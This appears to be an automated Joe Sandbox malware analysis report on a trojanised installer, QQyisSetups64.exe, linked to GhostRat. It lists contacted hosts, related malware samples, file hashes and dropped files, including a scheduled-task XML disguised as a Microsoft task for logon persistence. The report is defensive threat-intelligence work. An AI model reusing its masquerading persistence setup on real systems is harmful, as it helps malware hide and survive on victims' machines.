1.192.136.133	agt.p.360.cn	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
1.192.136.132	unknown	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
47.79.48.211	bawihgiq5whg32.oss-ap-southeast-1.aliyuncs.com	United States	9500	VODAFONE-TRANSIT-ASVodafoneNZLtdNZ	false
1.192.136.170	st.p.360.cn	China	137687	CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	false
118.107.44.219	unknown	Singapore	64050	BCPL-SGBGPNETGlobalASNSG	true

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1581909
Start date and time:	2024-12-29 11:17:11 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 31s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	22
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	QQyisSetups64.exe
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winEXE@16/34@8/14
EGA Information:	Successful, ratio: 66.7%
HCA Information:	Successful, ratio: 73% Number of executed functions: 293 Number of non-executed functions: 221
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 23.218.208.109, 13.107.246.63, 20.109.210.53
Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, time.windows.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target powershell.exe, PID 8136 because it is empty
Execution Graph export aborted for target powershell.exe, PID 8180 because it is empty
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
05:18:20	API Interceptor	509892x Sleep call for process: QQyisSetups64.exe modified
05:18:21	API Interceptor	12x Sleep call for process: powershell.exe modified
06:58:14	API Interceptor	2x Sleep call for process: svchost.exe modified
06:58:46	API Interceptor	1062055x Sleep call for process: inst.exe modified
11:17:59	Task Scheduler	Run new task: {9E352A23-57FD-4D37-86D2-FB0FC01D1DF6} path: .
11:18:25	Task Scheduler	Run new task: .Net OneStart path: C:\Users\user\Downloads\inst.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
39.156.85.201	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
171.8.167.90	xaAKuXBlkn.apk	Get hash	malicious	Unknown	Browse
	7YyaK2cB1s.apk	Get hash	malicious	Unknown	Browse
	A1FsbRkm5m.exe	Get hash	malicious	Unknown	Browse
39.156.85.200	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
1.192.136.135	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
39.156.85.231	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	pinst.360.cn/360safe/h_inst.cab?rd=36608336
1.192.136.171	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
1.192.136.171	360#U6d4b#U901f.exe	Get hash	malicious	Unknown	Browse
8.46.123.189	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
1.192.136.134	wyySetups64.exe	Get hash	malicious	GhostRat	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tr.p.360.cn	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	1.192.136.132
agt.p.360.cn	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	1.192.136.132
agt.p.360.cn	A1FsbRkm5m.exe	Get hash	malicious	Unknown	Browse	1.192.136.132
seupdate.360qhcdn.com	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	39.156.85.231
seupdate.360qhcdn.com	A1FsbRkm5m.exe	Get hash	malicious	Unknown	Browse	111.13.65.25
s.360.cn	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	180.163.251.230
	https://ebaite.cn/	Get hash	malicious	Unknown	Browse	101.198.2.147
	https://www.imttolkent.com/	Get hash	malicious	Unknown	Browse	171.13.14.66
	http://mylovelybluesky.com	Get hash	malicious	Unknown	Browse	171.8.167.89
	SecuriteInfo.com.Trojan.Click2.57467.3204.14689.exe	Get hash	malicious	Unknown	Browse	171.8.167.89
	SecuriteInfo.com.Trojan.Click2.57467.3204.14689.exe	Get hash	malicious	Unknown	Browse	171.13.14.66
	_____NCM______2_10042231.exe	Get hash	malicious	Unknown	Browse	180.163.251.230
	_____NCM______2_10042231.exe	Get hash	malicious	Unknown	Browse	180.163.251.230
	http://www.gourmethousemacau.com/	Get hash	malicious	Unknown	Browse	171.8.167.89
	http://china.cn	Get hash	malicious	Unknown	Browse	101.198.2.147
st.p.360.cn	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	1.192.136.170
st.p.360.cn	A1FsbRkm5m.exe	Get hash	malicious	Unknown	Browse	1.192.136.170
agd2.p.360.cn	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	1.192.194.232

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CMNET-GDGuangdongMobileCommunicationCoLtdCN	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	39.156.85.231
	db0fa4b8db0333367e9bda3ab68b8042.m68k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	117.150.97.30
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	117.151.161.150
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	117.135.228.168
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	36.169.144.160
	xd.mips.elf	Get hash	malicious	Mirai	Browse	112.28.62.4
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	117.183.45.215
	xd.x86.elf	Get hash	malicious	Mirai	Browse	221.183.165.41
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	36.167.111.22
	telnet.ppc.elf	Get hash	malicious	Unknown	Browse	36.184.46.9
CMNET-GDGuangdongMobileCommunicationCoLtdCN	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	39.156.85.231
	db0fa4b8db0333367e9bda3ab68b8042.m68k.elf	Get hash	malicious	Mirai, Gafgyt	Browse	117.150.97.30
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	117.151.161.150
	db0fa4b8db0333367e9bda3ab68b8042.sh4.elf	Get hash	malicious	Mirai, Gafgyt	Browse	117.135.228.168
	db0fa4b8db0333367e9bda3ab68b8042.x86.elf	Get hash	malicious	Gafgyt, Mirai	Browse	36.169.144.160
	xd.mips.elf	Get hash	malicious	Mirai	Browse	112.28.62.4
	xd.arm7.elf	Get hash	malicious	Mirai	Browse	117.183.45.215
	xd.x86.elf	Get hash	malicious	Mirai	Browse	221.183.165.41
	xd.sh4.elf	Get hash	malicious	Mirai	Browse	36.167.111.22
	telnet.ppc.elf	Get hash	malicious	Unknown	Browse	36.184.46.9
CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	1.192.136.170
	mips.elf	Get hash	malicious	Mirai	Browse	1.192.222.114
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	1.192.240.164
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	1.192.222.117
	meerkat.mpsl.elf	Get hash	malicious	Mirai	Browse	1.192.193.56
	mpsl.elf	Get hash	malicious	Mirai	Browse	36.99.183.94
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	1.192.193.76
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	1.192.240.133
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	36.99.33.202
	0aEXGHNxhO.elf	Get hash	malicious	Mirai, Okiru	Browse	36.99.206.133
CHINATELECOM-HENAN-LUOYANG-IDCLuoyangHenanProvincePR	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	1.192.136.170
	mips.elf	Get hash	malicious	Mirai	Browse	1.192.222.114
	mips.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	1.192.240.164
	Josho.ppc.elf	Get hash	malicious	Unknown	Browse	1.192.222.117
	meerkat.mpsl.elf	Get hash	malicious	Mirai	Browse	1.192.193.56
	mpsl.elf	Get hash	malicious	Mirai	Browse	36.99.183.94
	x86_64.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	1.192.193.76
	la.bot.mipsel.elf	Get hash	malicious	Mirai	Browse	1.192.240.133
	m68k.elf	Get hash	malicious	Mirai, Moobot	Browse	36.99.33.202
	0aEXGHNxhO.elf	Get hash	malicious	Mirai, Okiru	Browse	36.99.206.133

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	wyySetups64.exe	Get hash	malicious	GhostRat	Browse	47.79.48.211
	aYu936prD4.exe	Get hash	malicious	Unknown	Browse	47.79.48.211
	aYu936prD4.exe	Get hash	malicious	Unknown	Browse	47.79.48.211
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	47.79.48.211
	Gabriel-4.9.exe	Get hash	malicious	Nitol, Zegost	Browse	47.79.48.211
	setup.msi	Get hash	malicious	Unknown	Browse	47.79.48.211
	fxsound_setup.exe	Get hash	malicious	Unknown	Browse	47.79.48.211
	test5.exe	Get hash	malicious	CobaltStrike, Metasploit	Browse	47.79.48.211
	tzA45NGAW4.lnk	Get hash	malicious	Unknown	Browse	47.79.48.211
	soft 1.14.exe	Get hash	malicious	Meduza Stealer	Browse	47.79.48.211

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\{530B0790-97BF-4550-8023-6D8CB41E16CA}.tmp\360P2SP.dll	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
	A1FsbRkm5m.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll	wyySetups64.exe	Get hash	malicious	GhostRat	Browse
	A1FsbRkm5m.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Program Files (x86)\360\360Safe\{7C836BE6-5ADF-472f-957C-1E161D0963A3}.tf

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	data
Category:	dropped
Size (bytes):	38
Entropy (8bit):	2.9660690198796873
Encrypted:	false
SSDEEP:	3:2SBPWDSJ:LB+DSJ
MD5:	01B58E7AE696A93B8E2D1E2383FDA245
SHA1:	9AFE334D081B3124AA6BCF59BF2E02F946455064
SHA-256:	4D4EE2A9D6079605AC98ABA3F463BB8F4B9E3336F6308237FAD99BD8CA83866E
SHA-512:	C0ECA7BAAD44EAD66656903A2E66FF742B6D2682D40D9657CD2F6C0C2C8A0A4928EAF52C774668FD0AC6A190890D2204A7B159FF7BBF86CE7F216DCBF226850E
Malicious:	false
Preview:	{.7.C.8.3.6.B.E.6.-.5.A.D.F.-.4.7.2.f.

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7067254744868596
Encrypted:	false
SSDEEP:	1536:2JPJJ5JdihkWB/U7mWz0FujGRFDp3w+INKEbx9jzW9KHSjoN2jucfh11AoYQ6Vq0:2JIB/wUKUKQncEmYRTwh0g
MD5:	0F158B6E213D3E555DB72F86DDAB182E
SHA1:	3A555578A26858E1D4583587CD09ABF0409E759B
SHA-256:	505A9B6AB32DA55FE1C14E8984389CF4CEBF74FA9ABC0DE4DB50F1A3BD310AFB
SHA-512:	A2F1F51D7EB4FD53F6DD41B35715C229ECF1746433B9B8721239F5D96D9588B60FD10766953DE4B09A95A86471C844A98D5D57D2CFD11E51E4C4B291A900328F
Malicious:	false
Preview:	...........@..@.+...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................u.f!.Lz3.#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x006ac9d3, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.7900121941236503
Encrypted:	false
SSDEEP:	1536:DSB2ESB2SSjlK/JvED2y0IEWBqbMo5g5FYkr3g16k42UPkLk+kq+UJ8xUJoU+dzV:DazaPvgurTd42UgSii
MD5:	960A0C888289C6416C3F0CDA2EF01972
SHA1:	36E60FF1796D97914F8F2AFE81CE159501671122
SHA-256:	30F363234EF45600804E11485CCF2C7D2A6380773A3DEFD4B6C68BC091EFBCDF
SHA-512:	E142D5F4E1692E964A97BDDCE865877506D7CB84463789D2F72EA09DA84FE910926E6EBCDA9EE3F84110B10C63ECF2B9D119F5246CE613F65D4F3F4BB63A1603
Malicious:	false
Preview:	.j..... ...............X\...;...{......................0.`.....42...{5..:...\|..h.b.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........+...{...............................................................................................................................................................................................2...{.................................."I.M.:...\|....................a..:...\|...........................#......h.b.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Download File

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.082469114165686
Encrypted:	false
SSDEEP:	3:ttlEYecvixyqt/57Dek3JFOzpZS/YllEqW3l/TjzzQ/t:ttlEzuErR3t0pZiImd8/
MD5:	83616E5550B22596AE63B67A36519E5F
SHA1:	7CEAB0590D620D2816EFE21B190CF69D2C24FF6A
SHA-256:	D9E2F640E309F7813765B8E53870F90900019C181340ECC684F98AE888C97D6B
SHA-512:	E25FC14BD1756ACCCF3929BFFC63318792CE4A8B085A545804E02120DC471822D4FE4A6A9C82692B389EDB937C2DE88A0105D5ABEF73715547C4AB456F9A4F0E
Malicious:	false
Preview:	s.^......................................;...{...:...\|..42...{5.........42...{5.42...{5...Y.42...{59..................a..:...\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user~1\AppData\Local\Temp\!@t97F6.tmp (copy)

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	648
Entropy (8bit):	7.46325903759004
Encrypted:	false
SSDEEP:	12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
MD5:	DCF8A1E58C81782DC11CFF675B105B63
SHA1:	08D4821471E445965CAEAD5093AF44460CD74B92
SHA-256:	034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
SHA-512:	E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
Malicious:	false
Preview:	MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.\|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...\|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z....8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BEDT2L3A\inst[1].exe

Download File

Process:	C:\Users\user\Desktop\QQyisSetups64.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	4118496
Entropy (8bit):	7.743814085153487
Encrypted:	false
SSDEEP:	98304:9lBo/r7J2a4FL8VdL0hvADfHraEk1qhJonrnYmIb:1oD7x4yVdDfLa8ky
MD5:	AAA0F14BDFE3777EEE342C27DE409E6D
SHA1:	6B5F9A7B71E6B105D1BFA26B0C7A4931ED9E5179
SHA-256:	B35314C2C3B1AAB777D621C6FD8516A877B27EFBDE4DD4ADDD6843C411E96AA3
SHA-512:	D584D30083E34964D846C88EB558DBA338E3B8982D6D71EFEC36461AEA12127CFCBA2BE9510D9EF254A85680A2BA2DDB21583CE5E77D5CF3AC0A65800E5AB25A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 17%
Joe Sandbox View:	Filename: wyySetups64.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......!..e..e..e....A.a..l.B.y..Bb..d..l.^.s..{.S.a..Bb..f..Bb..@..e.....l.T...l.S...{.C.d..l.F.d..Riche..................PE..L...,D.f......................2...................@...........................?......?...@.....................................\|.......l</...........>.H)...@>.h...@...................................@............................................text............................... ..`.rdata...M.......N..................@..@.data...L....0......................@....rsrc...l</......>/.................@..@.reloc..(....@>.......=.............@..B................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:NlllulBkXj:NllUS
MD5:	453075887941F85A80949CDBA8D49A8B
SHA1:	7B31CA484A80AA32BCC06FC3511547BCB1413826
SHA-256:	84466098E76D1CF4D262F2CC01560C765FE842F8901EEE78B2F74609512737F8
SHA-512:	02E95B30978860CB5C83841B68C2E10EE56C9D8021DF34876CD33FD7F0C8B001C288F71FBBFF977DDF83031BD6CD86AC85688A6EFB6300D0221AA4A22ABE7659
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\PolicyManagement.xml

Download File

Process:	C:\Users\user\AppData\Roaming\QQyisSetups64.exe
File Type:	XML 1.0 document, ASCII text
Category:	dropped
Size (bytes):	1893
Entropy (8bit):	5.212287775015203
Encrypted:	false
SSDEEP:	48:c55XzDl4Q2ZbXL6Q0QFdOFQOzN33O4OiDdKrKsTLXbGMv:O5XzDl4Q2ZbGQhFdOFQOzBdKrKsTLXbV
MD5:	E3FB2ECD2AD10C30913339D97E0E9042
SHA1:	A004CE2B3D398312B80E2955E76BDA69EF9B7203
SHA-256:	1BD6DB55FFF870C9DF7A0AAC11B895B50F57774F20A5744E63BBC3BD40D11F28
SHA-512:	9D6F0C1E344F1DC5A0EF4CAAD86281F92A6C108E1085BACD8D6143F9C742198C2F759CA5BDFFAD4D9E40203E6B0460E84896D1C6B8B1759350452E1DE809B716
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2006-11-10T14:29:55.5851926</Date>. <Author>Microsoft Corporation</Author>. <Description>????? AD RMS ?????????????????? Web ?????????,???????????</Description>. <URI>\AS AMD updata</URI>. <SecurityDescriptor>D:(A;;FA;;;BA)(A;;FA;;;SY)(A;;FRFX;;;WD)</SecurityDescriptor>. </RegistrationInfo>. <Triggers>. <LogonTrigger id="06b3f632-87ad-4ac0-9737-48ea5ddbaf11">. <Enabled>true</Enabled>. <Delay>PT30S</Delay>. </LogonTrigger>. </Triggers>. <Principals>. <Principal id="AllUsers">. <GroupId>S-1-1-0</GroupId>. <RunLevel>HighestAvailable</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>Parallel</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>. <AllowHardTerm

C:\Users\user\AppData\Local\Temp\!@t97F6.tmp.P2P

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 648 bytes, 1 file, at 0x2c +A "setup.ini", number 1, 1 datablock, 0x1 compression
Category:	dropped
Size (bytes):	648
Entropy (8bit):	7.46325903759004
Encrypted:	false
SSDEEP:	12:wztrG9cLEvuu0zPphueB3phrHtFGW4RJlXi2BzbtQ4F2k5xcGKB5bDHKq:wfLE2FzR8eB3phRkXZzbtL2yxcGabDqq
MD5:	DCF8A1E58C81782DC11CFF675B105B63
SHA1:	08D4821471E445965CAEAD5093AF44460CD74B92
SHA-256:	034283B5FA8C86E481E4B927A234A7A83533B42B851E0924E48BE77032182F27
SHA-512:	E36E9AA8278BF2055A5F16991F05B3329A404EF025A132A6E42AAEAB65E0BD05A43BE0E0829B54F7ECC95F8F2B6F82D32D08BD32F15600AF3B52B6372CC51E04
Malicious:	false
Preview:	MSCF............,...................F.......V..........YvT .setup.ini....C:.V.CKeQ..A..7.?......jQO...3..AB'i3.N:t.0..GnD...K....`.0.g...{..U..`..i..eY.5.U}v.^..}{.-....r..O..U{..d~_..'.v;...........,.EY.....&.....]]-...g._.eqq[.+.W.z.....?.\|.....]o......~N...B...,^.].iw.....z}{.6....'..).Y..2P..]..(&kZ.!..2o.=... ..y..!..It.P....HTL.K..]....<...E...\|.....?.>.....Bg.......o.M...ud......1..B..#P..'......3N......G.].....y4.......g.j}c...9..w..G....A....z....8..F/.s:..4U.....\Z..1.....{O"...Io..(.0.P:...BJ.<..::..x$*#...NF.<..F.`...E.r.L ..9KS .r..5..-b".h~[.1...dIa..ia...s...Az...W.Y.-...H.q.......<...`....0@J.....

C:\Users\user\AppData\Local\Temp\!@t97F6.tmp.dir\setup.ini

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	Generic INItialization configuration [360Safe]
Category:	modified
Size (bytes):	854
Entropy (8bit):	5.54815735280418
Encrypted:	false
SSDEEP:	24:9QQ08ETkByYcqQZLTvOIuAALne2toBFjlVH:9QUETacqQJWIdAzxtonlV
MD5:	CB13859BCE5ADF79C6B2E1C4601FA06A
SHA1:	5562D46E7FBD8A3FF92AFE2270B23F5E73FF45D7
SHA-256:	601CFCA4A7123503331D7641666F7F48164AEB2494B007ECE4C8880F51AF6E2D
SHA-512:	C355FAE3C70B875A08F4BA8BC7D9463D5DB686D2113970F0ED17A5D723DA2ADF82334AFAF3345AABB51A2A89873C15926341AA18D90FF374FA1FB68B82BF3AC4
Malicious:	false
Preview:	[360Installer]..SlideShowResourceURL=http://down.360safe.com/360safe/slideshow_new.cab..From=h_inst..Product=360Safe....[360Safe]..Name=360........Pid=h_inst..FID=setup_13.0.0.2008k..Version=13.0.0.2009..RegVersionFile=360Ver.dll..IsBeta=0..Urls=pdown://b2=100027000\|p2=B0A12507C5F7FB22D8E1EB5B2682074BD0218EF0\|p3=20\|p7=15\|c2=1\|b5=360......\|b6=........\|b7=5\|b9=1\|http://dl.360safe.com/setup_13.0.0.2008k.exe..MD5FileID=E901BD5EEF684DD36520382E5FC26236..SetupParam=/pid=h_inst /noreboot=1 /installer=1 /S..SlideShowImage=360safe_1.png,360safe_2.png,360safe_3.png,....[360signdata]..sign=0100000094BB9E7DD93895D39142938A10B443920CBE15CC1E5C20E47CA37526F047D27B4EE9567798C27E09EB3C005E187E0CE1A9B7EA4C2DA5D92120A8B6ABEBF270462455BBA3FD1AA5ACE5C44196EF1083BB9FAEDAD4C74F82DEFB96A173B5519816D7C03F06C87BAC684A0CF6FB459E487DCDEF38C3AF0864CB102E42D0FF3412A0

C:\Users\user\AppData\Local\Temp\!@t97F6.tmp.mem

Download File

Process:	C:\Users\user\Downloads\inst.exe
File Type:	data
Category:	dropped
Size (bytes):	17
Entropy (8bit):	2.409267252251469
Encrypted:	false
SSDEEP:	3:lsS+n:U
MD5:	983514E15961BFDA71A616E3CA412147
SHA1:	8A938B2349A33CB8A45975F5E1084AC4ED702C72
SHA-256:	D22207FA67A53E84F79BEB0C103430CCAC7A6D6EEC028262135DDE91079F5566
SHA-512:	2C3D100D47A806CCB23F9ABCE816869C80B21EF6B6479C5A7BDEE47F9B14FCD004EE99F30ECC39A60AE35B1ADB0D4DAC52E58DABDB1885940A8888AC1E61B60E
Malicious:	false
Preview:	.................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1elknk1s.o3g.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nkbl4s2.egt.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_c20vb3hw.j2u.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_f5runsyw.t3p.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
